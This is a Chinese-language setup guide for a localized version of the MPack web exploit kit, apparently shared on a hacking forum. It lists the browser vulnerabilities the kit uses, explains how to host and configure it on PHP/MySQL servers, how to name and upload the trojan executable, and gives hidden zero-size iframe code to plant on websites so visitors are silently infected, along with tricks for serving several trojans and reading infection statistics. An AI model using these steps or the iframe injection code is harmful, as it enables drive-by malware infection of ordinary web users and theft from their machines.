汉化：安全警戒线

MPack 是一个被俄国黑客使用比较多的一个网马平台，他集合了微软IE以及LIUNX 火狐浏览器的所有

漏洞，是可以统计流量，查看浏览器种植情况，他附加了crypt这些免杀以及加密工具。

这个程序所利用到的漏洞：

Ms06-014

Ms06-006（可被利用的浏览器Firefox 1.5..x 和 Opera 7..x）

unnamed 0day for Win2000 (ms06-044)

QuickTime overflow

WebViewFolderIcon overflow

WinZip ActiveX overflow


安装：

复制文件内容上传到FTP空间里

空间必须支持PHP+MYSQL，设置文件夹属性(777)

用记事本形式打开settings.php 配置设置

找到$AdminPath = " 配置你空间程序路径，需填写域名比如：http://host.com/123/

设置完接着往下看
$$UserName="user>"; #这里填写后台登陆时候的用户名
$$PPassword="pass"; #这里填写密码

其他不需要设置，我已经设置好了。

接着找到：
$UseMySQL = 1;

下面填写MYSQL信息
$dbhost = "localhost";这里默认填写localhost，如果远程调用MYSQL`可以相应填写
$dbuser = "hackeroo"; 数据库用户
$dbpass = "hackeroo";数据库密码
$dbname = "hackeroo";数据库名


填写完成直接访问http://myhost.com/123/index.php，就可以成功安装了，无须导入数据库文件


打开file.php 找到$file="file.exe";  //木马文件名

如过按默认设置`就传上你的马改名为file.exe，上传到跟目录

使用技巧：

挂站代码依然是<iframe width='0' height='0' src=http://myhost.com/123/index.php></iframe>

如果你有N个木马需要挂就修改
file.php中的if (isset($_GET['id'])) {
$file="loader_".basename($_GET['id']).".exe"; //NB
}

这里可以修改GET ID值，比如我设置木马ID值为001..exe
那么就可以用http://myhost.com/123/index.php?id=001这样访问就可以了

挂站代码就是<iframe width='0' height='0' src=http://myhost.com/123/index.php?id=001></iframe>

这个后台是统计所有的EXE ID值 ，如果我单看一个木马所安装的流量和其他信息，也可以用

http://myhost.com/123/flush.php?.pass =

直接访问stats.php也可以，是简洁统计信息


修改后台伪装信息可以修改notfound.php

其他文件不需要我们动，都是网马文件和程序附加文件，源代码中的中文可以随便修改，但乱码和其

他看不懂的不要动，会影响程序错误，因为原版是俄文，所以翻译是用工具转成英文，在翻译成中文

比较累，v0.95 是最新版本，其中调试的时候好象有不明URL存在，好象是我MYSQL存留的信息或者

是后门文件，也可能是URL木马文件没更新到EXP里，总之大家一起解决吧

这是转载请留下汉化人。谢谢